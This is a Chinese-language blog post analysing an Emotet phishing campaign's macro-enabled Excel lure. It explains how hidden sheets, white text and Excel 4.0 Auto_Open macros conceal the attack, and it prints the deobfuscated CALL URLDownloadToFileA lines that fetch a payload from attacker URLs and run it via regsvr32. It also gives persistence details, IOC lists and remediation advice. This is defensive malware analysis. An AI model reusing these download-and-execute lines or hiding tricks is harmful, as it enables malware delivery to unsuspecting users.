emotet木马病毒家族分析与excel宏表函数

emotet木马病毒家族分析与excel宏表函数

起因

某公司邮服收到大量恶意钓鱼邮件,有员工中招后被拖通讯录,公司内大量邮箱账号密码遭到爆破。

家族背景

Emotet于2014 年被首次发现,最初是作为一种银行木马病毒进行传播,但随着发展逐渐囊括了越来越多的恶意程序,如Trickbot 和 QBot,以及勒索软件Conti、ProLock、Ryuk和 Egregor等,构建成了一个庞大的僵尸网络。

样本分析

样本属性

文件名:VBUQ-2683135.xlsm

文件类型:Microsoft Excel 启用宏的工作表 (.xlsm)

MD5:129114c1b5589116cfa4af9058801b6a

SHA1:0bfff936fcb796e1600805ce789723f51fac6e78

SHA256:83f9bd1734c030f5053d4ab28eba39d91fdf880d1b7bb39b98602912e81ff709

邮件样本

邮件样本如下:

image-20220311142550003

解压后得到excel文件

常见的office文档诱饵,引导受害者点击启用内容加载宏代码,如下图:

image-20220314111246813

攻击方式

此次钓鱼邮件利用手法比较新颖,能够规避一般类型的检测。

垃圾邮件中传播使用zip格式的压缩包中包含OFFICE文档或VBS脚本,这样做可以绕过CDR(内容撤防与重建)技术。在大规模网络钓鱼攻击活动期间,CDR会对进入的文件进行解构,并检查其中是否包含恶意组件。如果包含恶意组件,它会删除这些恶意组件,重新构建一个全新的版本传递给网络上的最终用户。此次样本不会在邮件中直接包含恶意组件,而是将恶意组件进行压缩投递并加密,可以绕过CDR检测技术。

攻击者中放弃使用exe文件以下载后续有效载荷,转而使用dll文件作为后续载荷。本次宏病毒利用了Excel 4.0宏在Excel文档中的存储方式,并结合了字体颜色、工作表隐藏和列隐藏等技巧隐藏Excel 4.0宏代码。详细分析过程如下:

首先攻击者将工作表隐藏,只留下了sheet1作为诱饵图片引诱受害者点击启用内容调用宏代码

先把隐藏的工作表显示出来:

image-20220315115538390

显示隐藏的白色字体:

image-20220315120033399

显示后为攻击者的字典表,其他表会通过excel的拼接调用这张表的字符来组成攻击语句

image-20220315143402748

同样的方法显示其余工作表,可以看到攻击者会去请求以下URL地址

image-20220315143508831

入口函数:

image-20220315115355851

通过拼接Vfrbuk1工作表组成恶意语句

image-20220315144310574

这里的EFALGV表启用了excel 4.0的宏表函数

将列的第一个单元格重命名为Auto_Open,会使整列按顺序执行宏表函数

其中D1的单元格名称就为Auto_Open

image-20220316175630358

宏代码分析

点击启用内容后,自动拼接成如下语句

image-20220315162956958

FORMULA(a,b)是excel4.0宏表函数,意思是把a的值赋值给b

CALL()只在excel宏表上可用,用来调用动态链接库dll文件

最后通过EXEC()函数来执行命令,利用regsvr32.exe调用dll文件(aew.ocx),/s为静默运行

启用内容后:

image-20220316200246381

aew.ocx文件会写入用户目录,之后会把自身拷贝到AppData\Local目录的随机名文件夹下

恶意程序会向注册表写入一条启动项

计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

image-20220316200714996

image-20220316201356098

可执行文件分析

小编对二进制及逆向研究不深 此小章可能有许多纰漏,希望师傅们能与我交流指正

没有找到如绿盟(http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/)这篇分析文章 有关窃取邮箱的伪代码 有熟悉x64dbg、IDA的师傅们可以联系我 想学习一下

aew.ocx可执行文件

image-20220314175017316

以下分析这个aew.ocx可执行文件

wininet dll断点

image-20220316082732238

读取浏览器Internet存储的临时文件,历史记录和cookie

image-20220316082948874

image-20220316083013346

image-20220316083033598

断在httpsendRequestW,此时c2 list已经解密成功了,我们从cookie往上翻一点就可以找到

image-20220316083405691

image-20220316085919209

流量分析

单步调试宏表函数

有https的抓不到流量,在复现的时候目标网站均已无法下载ocx文件

=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabdsangramnews.com/wp-includes/0EkuXhpisAiyU/","..\aew.ocx",0,0)

image-20220316114432591

=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newmainghantabazar.com/wp-includes/UOMqB99D/","..\aew.ocx",0,0))

image-20220316115449401

=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dehraduncabs.com/wp-includes/nQrr0/","..\aew.ocx",0,0))

image-20220316115859589

=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://patriciamirapsicologa.com/wp-includes/OfXgW/","..\aew.ocx",0,0))

image-20220316145435227

=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vdheuvel.net/gallerijen/MZM66d1KZQI0IjLc/","..\aew.ocx",0,0))

image-20220316145646255

=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://googletopstories.in/wp-admin/css/colors/4Fx/","..\aew.ocx",0,0))

image-20220316201131656

查杀结果

结合云沙箱运行文件和ip域名查询

VT查杀

image-20220314145805490

微步查询域名:shabdsangramnews.com

image-20220314145700453

查询IP:185.168.130.138

image-20220314145855486

aew.ocx查杀结果:

image-20220316165337141

IOCs(失陷指标)

shabdsangramnews.com
newmainghantabazar.com
dehraduncabs.com
patriciamirapsicologa.com
vdheuvel.net
googletopstories.in
168.119.39.118
185.168.130.138
168.197.250.14
195.77.239.39
68.183.93.250
185.184.25.78
118.98.72.86
78.47.204.80
159.69.237.188
61.7.231.226
103.41.204.169
207.148.81.119
85.214.67.203
190.90.233.66
191.252.103.16
93.104.209.107
194.9.172.107
66.42.57.149
59.148.253.194
62.171.178.147
139.196.72.155
198.199.98.78
185.148.168.15
195.154.146.35
104.131.62.48
37.44.244.177
217.182.143.207
54.38.242.185
185.148.168.220
203.153.216.46
87.106.97.83
78.46.73.125
54.37.106.167
37.59.209.141
54.37.228.122
61.7.231.229
45.71.195.104
116.124.128.206
128.199.192.135
210.57.209.142

TTPs(战术、技术&程序)

ATT&CK:TA0003(https://attack.mitre.org/tactics/TA0003/)

1.攻击者通过大量投放钓鱼邮件,引导用户查看excel文档

2.利用文档中带有迷惑性的图片诱导用户点击启用内容(启用宏)

3.向攻击者的C2服务器请求内容,下载木马,达到控制计算机,实现数据窃取等黑客行为。

攻击链路:mail->excel(xlsm excel 4.0macro)->regsvr32.exe -s ..\[random].ocx->c2 server

image-20220316164700531

处置建议

宏表函数(Excel Macro4.0)是一项很老的技术了,默认设置下都会禁用,但是作为excel本身自带的功能,会对其警惕性降低,在以前这项技术没有过多的往安全性上去考虑,微软在 1993 年用 VBA 取代了 Excel 4.0 宏,但它们仍然可以运行,现在热度上升是因为被黑客盯上了。

1.不接收和下载陌生邮件内容

2.默认设置禁用宏,如无必要不启用宏内容

3.清理注册表(计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)

4.删除AppData\Local下的恶意程序

5.安装杀软(火绒可以检测此次emotet样本)

参考文章

https://www.antiy.com/response/20210206.html

http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/

https://www.joesandbox.com/analysis/581892/0/html#statistics

https://www.fortinet.com/blog/threat-research/analysis-of-the-new-modules-that-emotet-spreads

https://stackoverflow.com/questions/41402120/what-is-excel-4-0-macro

https://attack.mitre.org/tactics/TA0003/

感谢此次分析工作中@DDD@gd@Scr1pt的支持与帮助

posted @ 2022-03-23 15:07  LEOGG  阅读(257)  评论(0编辑  收藏  举报